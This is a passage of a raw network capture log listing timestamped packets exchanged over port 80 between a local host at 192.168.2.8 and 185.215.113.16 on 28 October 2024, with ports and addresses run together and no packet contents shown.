                                                                                                    Oct 28, 2024 07:18:47.853987932 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854047060 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.854052067 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854063988 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854074955 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854085922 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854115009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.854115963 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.854168892 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854216099 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.854218960 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854231119 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854259968 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854271889 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854283094 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854285955 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.854300022 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854310036 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854321003 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.854340076 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.854377031 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854387999 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.854427099 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.873872042 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.873889923 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.873900890 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.873913050 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.873924971 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.873934984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.874008894 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.874021053 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.874032021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.874075890 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.874075890 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.874075890 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.874075890 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875477076 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875577927 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875587940 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875597954 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875618935 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875629902 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875643015 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875655890 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875698090 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875698090 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875698090 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875708103 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875719070 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875730991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875744104 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875755072 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875775099 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875780106 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875790119 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875802994 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875802994 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875813961 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875850916 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875852108 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875853062 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875864029 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875873089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875891924 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875896931 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875910044 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875956059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875956059 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875956059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.875967979 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875978947 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.875991106 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876008987 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876020908 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876029968 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876050949 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876050949 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876063108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876074076 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876085043 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876087904 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876116991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876121998 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876121998 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876128912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876140118 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876176119 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876176119 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876187086 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876235962 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876293898 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876305103 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876316071 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876339912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876352072 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876363039 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876384974 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876384974 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876384974 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876413107 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876430035 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876441002 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876451969 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876465082 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876475096 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876477003 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876513004 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876513004 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876601934 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876619101 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876631021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876641989 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876660109 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876672029 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876678944 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876678944 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876681089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876693964 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876703024 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876723051 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876723051 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876734018 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876744032 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876765966 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876774073 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876800060 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.876842022 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876852036 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876862049 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876867056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.876986980 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.902245045 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.918028116 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.918046951 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.918060064 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.918128014 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.918956995 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.919064999 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.919122934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959400892 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959443092 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959455967 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959467888 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959481001 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959511042 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959562063 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959573984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959587097 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959599018 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959613085 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959625959 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959661961 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959673882 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959752083 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959763050 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959767103 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959768057 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959768057 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959768057 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959768057 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959774017 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959785938 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959796906 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959809065 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959820032 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.959850073 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959850073 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959850073 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.959861040 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972593069 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972615957 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972628117 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972640991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972691059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972696066 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972733021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972743988 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972755909 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972814083 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972825050 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972836018 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972847939 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972884893 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972898006 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972906113 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972906113 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972906113 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972907066 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972907066 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972968102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972970963 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.972979069 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.972990036 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973015070 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973027945 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973037958 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973050117 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973057985 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973057985 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973061085 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973072052 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973107100 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973141909 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973144054 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973144054 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973153114 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973179102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973212004 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973212957 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973212957 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973222017 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973232031 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973253965 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973274946 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973299026 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973345041 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973356009 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973412991 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973416090 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973428011 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973438025 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973472118 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973472118 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.973491907 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973500967 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.973546982 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.974736929 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.974749088 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.974760056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.974771023 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.974834919 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.992768049 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.992790937 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.992800951 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.992845058 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.992856979 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.992975950 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.992975950 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.993069887 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.993083000 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.993093014 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.993158102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.993163109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.993163109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.993170023 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.993182898 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.993232965 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.994766951 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994785070 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994796038 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994807959 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994820118 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994829893 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994837046 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994858980 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.994869947 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994884014 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994910002 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994921923 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994932890 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994945049 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994959116 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994972944 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994983912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.994992971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.994992971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.994992971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.994992971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.994993925 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995007038 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995023966 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995053053 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995064974 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995090961 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995090961 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995107889 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995120049 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995147943 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995179892 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995191097 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995224953 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995233059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995254040 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995265007 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995273113 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995326996 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995345116 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995357990 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995374918 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995387077 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995398998 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995410919 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995419025 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995431900 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995438099 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995443106 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995451927 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995457888 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995464087 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995480061 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995491028 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995501041 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995512009 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995515108 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995515108 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995522976 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995534897 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995547056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995549917 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995559931 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995563030 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995584011 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995594978 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995609045 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995620012 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995630026 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995672941 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995686054 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995696068 CET8049717185.215.113.16192.168.2.8
